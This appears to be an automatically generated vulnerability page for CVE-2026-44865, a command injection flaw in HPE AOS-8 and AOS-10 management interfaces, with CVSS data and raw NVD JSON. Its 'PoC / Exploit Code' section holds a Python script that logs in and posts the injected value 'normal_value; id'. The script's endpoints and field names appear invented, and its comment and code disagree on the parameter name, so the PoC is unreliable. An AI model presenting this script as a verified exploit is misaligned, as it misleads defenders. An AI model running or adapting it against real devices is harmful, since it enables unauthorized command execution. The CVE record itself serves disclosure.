Security Vulnerability Report
CVE-2026-44865 CVSS 7.2 HIGH

CVE-2026-44865

Published: 2026-05-12 20:16:45
Last Modified: 2026-05-12 20:16:45

Description

Command injection vulnerabilities exist in the web-based management interface of AOS-8 and AOS-10 Operating Systems. Successful exploitation of these vulnerabilities could allow an authenticated remote attacker to execute arbitrary commands on the underlying operating system.

CVSS Details

CVSS Score: 7.2
Severity: HIGH
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

No configuration data available.

HPE AOS-8
HPE AOS-10

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests
# Target URL (example)
target_url = "https://<victim-ip>/api/v1/management/interface"
# Attacker credentials (required due to PR:H)
username = "admin"
password = "password"
# Malicious payload to execute 'id' command
# Using semicolon to chain commands
payload = "normal_value; id"
# Session management
session = requests.Session()
login_data = {"user": username, "pass": password}
# 1. Login to get authenticated session
login_response = session.post("https://<victim-ip>/login", data=login_data)
if login_response.status_code == 200:
    print("[+] Login successful")
    # 2. Send payload to the vulnerable endpoint
    # The application takes 'interface' parameter and executes it in a shell
    exploit_data = {"interface_name": payload}
    response = session.post(target_url, data=exploit_data)
    # 3. Check output
    if response.status_code == 200:
        print("[+] Exploit sent")
        print("Response:")
        print(response.text)
else:
    print("[-] Login failed")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-44865", "sourceIdentifier": "[email protected]", "published": "2026-05-12T20:16:45.137", "lastModified": "2026-05-12T20:16:45.137", "vulnStatus": "Received", "cveTags": [], "descriptions": [{"lang": "en", "value": "Command injection vulnerabilities exist in the web-based management interface of AOS-8 and AOS-10 Operating Systems. Successful exploitation of these vulnerabilities could allow an authenticated remote attacker to execute arbitrary commands on the underlying operating system."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "baseScore": 7.2, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.2, "impactScore": 5.9}]}, "references": [{"url": "https://support.hpe.com/hpesc/public/docDisplay?docId=hpesbnw05048en_us&docLocale=en_US", "source": "[email protected]"}]}}